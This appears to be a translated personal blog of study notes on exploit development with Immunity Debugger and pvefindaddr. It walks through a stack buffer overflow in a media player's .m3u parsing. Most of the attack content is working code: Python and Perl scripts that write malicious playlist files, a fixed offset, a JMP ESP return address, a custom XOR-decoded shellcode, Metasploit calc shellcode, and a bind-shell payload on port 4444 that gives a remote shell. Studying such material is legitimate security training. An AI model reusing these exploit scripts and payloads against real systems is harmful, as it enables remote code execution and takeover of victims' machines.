• Learning ImmunityDebugger


    Immunity Debugger is built specifically to speed up exploit development and to assist vulnerability research and malware analysis. It has a full graphical user interface and ships with the most capable Python security tool library available so far. It neatly combines dynamic debugging with a powerful static analysis engine, and it also includes a highly customizable set of pure-Python graphing algorithms that help draw the control flow of a function body and the basic blocks inside it.



    Also: windbg -I (the capital I registers WinDbg as the just-in-time debugger)

    These are only my study notes, nothing more; apologies for the various reposts.

    Installation guide: http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_install

    Usage: http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_usage


    Download pvefindaddr.py and put it in the PyCommands directory of Immunity Debugger v1.8.3; it can then be used from the command line.


    Let's learn how to use it with a worked example.

    pvefindaddr pattern_create 6000  

    After a moment you will see the prompt "check mspattern.txt". Open mspattern.txt in the Immunity Debugger directory, copy the pattern string into our exploit code, regenerate the file, then load the malicious document containing the pattern into Immunity Debugger and run it.


    pvefindaddr findmsp runs the automated analysis; if it succeeds you get the faulting address and the overwritten SEH record.

    Official description:
    This function will try to find the start of a so-called cyclic pattern (aka Metasploit pattern) in memory, and will also try to find the offset of the cyclic pattern referenced by a register, the offset into a register, or on the stack.
    Besides this, findmsp will also try to guess the offset to the beginning of a long string of A's.
    No arguments are required; all output is written to the log window.

    You can see the SEH chain and the exception address.

    Of course you can also load it in WinDbg, where the exception shows up as well; examine the exception:


    In both debuggers you see the SEH chain address 47356f47.

    Next we check how many bytes it took to get there:


    pattern_offset: this function tries to find the exact position of a given 4 bytes inside a cyclic pattern.
    It takes one argument: the 4 bytes to locate. They can be given as 4 characters or as 4 bytes; in either case no spaces may be inserted between the characters or bytes.
    Even if the order of the 4 bytes has been reversed, the function will still locate the exact position, counted from the start of the cyclic pattern.

    Syntax: pattern_offset <4 bytes>

    Output is written to the log window only.
    We see that the SEH chain address lies at offset 5115.


    There are also commands that can suggest a solution automatically:



    DEP reference: http://blog.csdn.net/zcc1414/article/details/11709405

    Reference for these notes:

    http://bbs.pediy.com/showthread.php?t=130748&highlight=pvefindaddr

    Next, let's learn from part 1 of the exploit writing series.
    First: for this program, creating a test file directly with !pvefindaddr pattern_create xxxxx will not work!!!!!
    The program probably performs some checks, such as filtering disallowed characters in the file name and path, and simply pops up a dialog instead of crashing.

    Python script:
    PS: Python scripts turn out to be really useful; they speed up learning!
    1. First test with a run of '\x41' bytes. The program does not pop the dialog, and you can see EIP filled with \x41.
    Roughly pick a count to test, then append the string generated by !pvefindaddr pattern_create; that lets you work out how many bytes it takes. (Note: the pattern string cannot be sent on its own, because the program checks the input; keep this in mind from now on.)
    junk = '\x41'*26000
    junk2 = ('Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B')
    exploit = junk+junk2

    try:
      # 'wb' so that no newline translation touches the bytes on Windows
      file=open('C:\\Users\\Administrator\\Desktop\\exploits.m3u','wb')
      file.write(exploit)
      file.close()
      print 'File created, time to PEW PEW!\n'
    except:
      print 'Something went wrong!\n'
      print 'Check if you have permissions to write in that folder, or if the folder exists!'




    You can see our pattern string on ESP, so the number of bytes it took to reach EIP can be worked out automatically.
    Running pattern_offset with the value taken from our pattern as its argument shows that it was byte 75 of the pattern that did it.
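    As an added example (Python 3, not code from the post or from pvefindaddr), here is a small re-implementation of what pattern_create, pattern_offset and findmsp do, so the two numbers read off above can be reproduced offline: the SEH chain address 47356f47 maps to pattern offset 5115, and the EIP value at pattern offset 75 after the 26000 'A's gives a total of 26075. The EIP dword 0x41356341 is constructed here from that layout; the post only shows the resulting offset.

```python
import string

# Added example, not code from the post or from pvefindaddr: a minimal
# re-implementation of pattern_create / pattern_offset / findmsp.
_UPPER, _LOWER, _DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
# The full unique pattern is 26 * 26 * 10 triplets = 20280 characters.
_FULL = "".join(u + l + d for u in _UPPER for l in _LOWER for d in _DIGITS)


def pattern_create(length):
    """Return `length` characters of the cyclic pattern (repeats past 20280)."""
    return (_FULL * (length // len(_FULL) + 1))[:length]


def pattern_offset(value, length=len(_FULL)):
    """Offset of a 4-byte value inside the pattern, or -1 if it is not there.

    `value` is 4 characters ("Go5G") or 8 hex digits ("47356f47") as read
    from a register or the SEH chain. Both byte orders are tried: the
    debugger shows the register big-endian, but the bytes that overwrote it
    sit in memory little-endian, so the hex form is normally found reversed.
    """
    if len(value) == 8 and all(c in string.hexdigits for c in value):
        needle = bytes.fromhex(value).decode("latin-1")
    elif len(value) == 4:
        needle = value
    else:
        raise ValueError("expected 4 characters or 8 hex digits")
    pat = pattern_create(length)
    for candidate in (needle, needle[::-1]):
        idx = pat.find(candidate)
        if idx != -1:
            return idx
    return -1


def find_pattern_start(buf):
    """Like findmsp: index at which the cyclic pattern begins inside buf."""
    return buf.find(_FULL[:6])  # the pattern always opens with "Aa0Aa1"


if __name__ == "__main__":
    # SEH chain address read out in the post: 0x47356f47 -> offset 5115.
    print(pattern_offset("47356f47"))
    # Constructed layout of the first test script: 26000 'A's, then the pattern.
    buf = "\x41" * 26000 + pattern_create(6000)
    start = find_pattern_start(buf)            # 26000
    # Constructed EIP value: the 4 bytes at pattern offset 75 ("Ac5A"),
    # read as a little-endian dword, give 0x41356341.
    print(start + pattern_offset("41356341"))  # 26075
```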


    Next:

    #!/usr/bin/python

    junk = '\x41'*(26075)    # 26000 + 75: everything up to the saved return address
    eip = '\x11'*4           # marker that should land in EIP
    nop = '\x90'*20
    prejunk = '\x42'*700


    exploit = junk+eip+nop+prejunk

    try:
      # 'wb' so that no newline translation touches the bytes on Windows
      file=open('C:\\Users\\Administrator\\Desktop\\exploits.m3u','wb')
      file.write(exploit)
      file.close()
      print 'File created, time to PEW PEW!\n'
    except:
      print 'Something went wrong!\n'
      print 'Check if you have permissions to write in that folder, or if the folder exists!'


    As expected, EIP is now \x11 * 4.
    But there is still a problem after that!!!
    The 20 \x90 bytes we placed after EIP are not all there, so we guess that a few of them got clobbered.



    Only now do we build the shellcode:


    The JMP ESP address found in WinDbg differs from the one found in OllyDbg: the program's DLL is relocated.

    #!/usr/bin/python

    junk = '\x41'*(26075)
    jmpesp = '\xd7\x93\xd3\x7d'   # 7DD393D7 (JMP ESP), little-endian

    nop = '\x90'*25
    # Decoder stub: it finds its own address via fnstenv, then XORs every
    # byte of the encoded payload below with 0x11 until it decodes a 0x90.
    shellcode = ('\xD9\xEE'             # fldz
    '\xD9\x74\x24\xF4'                  # fnstenv [esp-0xc]  (address of fldz ends up on the stack)
    '\x58'                              # pop eax
    '\x83\xC0\x1b'                      # add eax, 0x1b      (start of the encoded bytes)
    '\x33\xC9'                          # xor ecx, ecx
    '\x8A\x1C\x08'                      # mov bl, [eax+ecx]
    '\x80\xF3\x11'                      # xor bl, 0x11
    '\x88\x1C\x08'                      # mov [eax+ecx], bl
    '\x41'                              # inc ecx
    '\x80\xFB\x90'                      # cmp bl, 0x90
    '\x75\xF1'                          # jnz back to mov bl, [eax+ecx]
    # encoded payload; the final 0x81 decodes to the 0x90 terminator
    '\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'
    '\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'
    '\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'
    '\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'
    '\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'
    '\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'
    '\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'
    '\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'
    '\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'
    '\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'
    '\x42\xee\x46\xed\x42\xee\x46\xe9\x81')


    exploit = junk+jmpesp+nop+shellcode

    try:
      # 'wb' so that no newline translation touches the bytes on Windows
      file=open('C:\\Users\\Administrator\\Desktop\\exploits.m3u','wb')
      file.write(exploit)
      file.close()
      print 'File created, time to PEW PEW!\n'
    except:
      print 'Something went wrong!\n'
      print 'Check if you have permissions to write in that folder, or if the folder exists!'

    Finally, success:




    Now the same thing as a Perl script:
    # windows/exec - 223 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # EXITFUNC=process, CMD=calc
    my $file = "test.m3u";
    my $junk = "\x41" x 26075;
    my $jmpesp = pack('V', 0x7DD393D7);   # JMP ESP at 7DD393D7, packed little-endian
    my $nop = "\x90" x 25;
    my $buf =
    "\xba\x9d\xae\x2f\x1c\xdb\xc5\x31\xc9\xd9\x74\x24\xf4\x5b" .
    "\xb1\x32\x31\x53\x12\x83\xc3\x04\x03\xce\xa0\xcd\xe9\x0c" .
    "\x54\x98\x12\xec\xa5\xfb\x9b\x09\x94\x29\xff\x5a\x85\xfd" .
    "\x8b\x0e\x26\x75\xd9\xba\xbd\xfb\xf6\xcd\x76\xb1\x20\xe0" .
    "\x87\x77\xed\xae\x44\x19\x91\xac\x98\xf9\xa8\x7f\xed\xf8" .
    "\xed\x9d\x1e\xa8\xa6\xea\x8d\x5d\xc2\xae\x0d\x5f\x04\xa5" .
    "\x2e\x27\x21\x79\xda\x9d\x28\xa9\x73\xa9\x63\x51\xff\xf5" .
    "\x53\x60\x2c\xe6\xa8\x2b\x59\xdd\x5b\xaa\x8b\x2f\xa3\x9d" .
    "\xf3\xfc\x9a\x12\xfe\xfd\xdb\x94\xe1\x8b\x17\xe7\x9c\x8b" .
    "\xe3\x9a\x7a\x19\xf6\x3c\x08\xb9\xd2\xbd\xdd\x5c\x90\xb1" .
    "\xaa\x2b\xfe\xd5\x2d\xff\x74\xe1\xa6\xfe\x5a\x60\xfc\x24" .
    "\x7f\x29\xa6\x45\x26\x97\x09\x79\x38\x7f\xf5\xdf\x32\x6d" .
    "\xe2\x66\x19\xfb\xf5\xeb\x27\x42\xf5\xf3\x27\xe4\x9e\xc2" .
    "\xac\x6b\xd8\xda\x66\xc8\x16\x91\x2b\x78\xbf\x7c\xbe\x39" .
    "\xa2\x7e\x14\x7d\xdb\xfc\x9d\xfd\x18\x1c\xd4\xf8\x65\x9a" .
    "\x04\x70\xf5\x4f\x2b\x27\xf6\x45\x48\xa6\x64\x05\x8f";

    open(my $FILE, '>', $file) or die "cannot open $file: $!";
    binmode($FILE);   # no newline translation on Windows
    print $FILE $junk . $jmpesp . $nop . $buf;
    close($FILE);
    

    Getting a shell (a TCP bind shell payload):

    The attacker then runs telnet <target IP> <port> from CMD
    and gets a shell.
    my $file = "test.m3u";
    my $junk = "\x41" x 26075;
    my $jmpesp = pack('V', 0x7DD393D7);   # JMP ESP at 7DD393D7, packed little-endian
    my $nop = "\x90" x 25;

    # windows/shell_bind_tcp - 368 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # LPORT=4444, RHOST=192.168.198.1, EXITFUNC=process,
    # InitialAutoRunScript=, AutoRunScript=
    my $buf =
    "\x31\xc9\xb1\x56\xb8\x28\x2d\x92\x06\xd9\xcb\xd9\x74\x24" .
    "\xf4\x5a\x31\x42\x0f\x03\x42\x0f\x83\xc2\x2c\xcf\x67\xfa" .
    "\xc4\x86\x88\x03\x14\xf9\x01\xe6\x25\x2b\x75\x62\x17\xfb" .
    "\xfd\x26\x9b\x70\x53\xd3\x28\xf4\x7c\xd4\x99\xb3\x5a\xdb" .
    "\x1a\x72\x63\xb7\xd8\x14\x1f\xca\x0c\xf7\x1e\x05\x41\xf6" .
    "\x67\x78\xa9\xaa\x30\xf6\x1b\x5b\x34\x4a\xa7\x5a\x9a\xc0" .
    "\x97\x24\x9f\x17\x63\x9f\x9e\x47\xdb\x94\xe9\x7f\x50\xf2" .
    "\xc9\x7e\xb5\xe0\x36\xc8\xb2\xd3\xcd\xcb\x12\x2a\x2d\xfa" .
    "\x5a\xe1\x10\x32\x57\xfb\x55\xf5\x87\x8e\xad\x05\x3a\x89" .
    "\x75\x77\xe0\x1c\x68\xdf\x63\x86\x48\xe1\xa0\x51\x1a\xed" .
    "\x0d\x15\x44\xf2\x90\xfa\xfe\x0e\x19\xfd\xd0\x86\x59\xda" .
    "\xf4\xc3\x3a\x43\xac\xa9\xed\x7c\xae\x16\x52\xd9\xa4\xb5" .
    "\x87\x5b\xe7\xd1\x64\x56\x18\x22\xe2\xe1\x6b\x10\xad\x59" .
    "\xe4\x18\x26\x44\xf3\x5f\x1d\x30\x6b\x9e\x9d\x41\xa5\x65" .
    "\xc9\x11\xdd\x4c\x71\xfa\x1d\x70\xa4\xad\x4d\xde\x16\x0e" .
    "\x3e\x9e\xc6\xe6\x54\x11\x39\x16\x57\xfb\x4c\x10\x99\xdf" .
    "\x1d\xf7\xd8\xdf\xb0\x5b\x54\x39\xd8\x73\x30\x91\x74\xb6" .
    "\x67\x2a\xe3\xc9\x4d\x06\xbc\x5d\xd9\x40\x7a\x61\xda\x46" .
    "\x29\xce\x72\x01\xb9\x1c\x47\x30\xbe\x08\xef\x3b\x87\xdb" .
    "\x65\x52\x4a\x7d\x79\x7f\x3c\x1e\xe8\xe4\xbc\x69\x11\xb3" .
    "\xeb\x3e\xe7\xca\x79\xd3\x5e\x65\x9f\x2e\x06\x4e\x1b\xf5" .
    "\xfb\x51\xa2\x78\x47\x76\xb4\x44\x48\x32\xe0\x18\x1f\xec" .
    "\x5e\xdf\xc9\x5e\x08\x89\xa6\x08\xdc\x4c\x85\x8a\x9a\x50" .
    "\xc0\x7c\x42\xe0\xbd\x38\x7d\xcd\x29\xcd\x06\x33\xca\x32" .
    "\xdd\xf7\xfa\x78\x7f\x51\x93\x24\xea\xe3\xfe\xd6\xc1\x20" .
    "\x07\x55\xe3\xd8\xfc\x45\x86\xdd\xb9\xc1\x7b\xac\xd2\xa7" .
    "\x7b\x03\xd2\xed";

    open(my $FILE, '>', $file) or die "cannot open $file: $!";
    binmode($FILE);   # no newline translation on Windows
    print $FILE $junk . $jmpesp . $nop . $buf;
    close($FILE);


  • Original article: https://www.cnblogs.com/zcc1414/p/3982393.html
Copyright © 2020-2023  润新知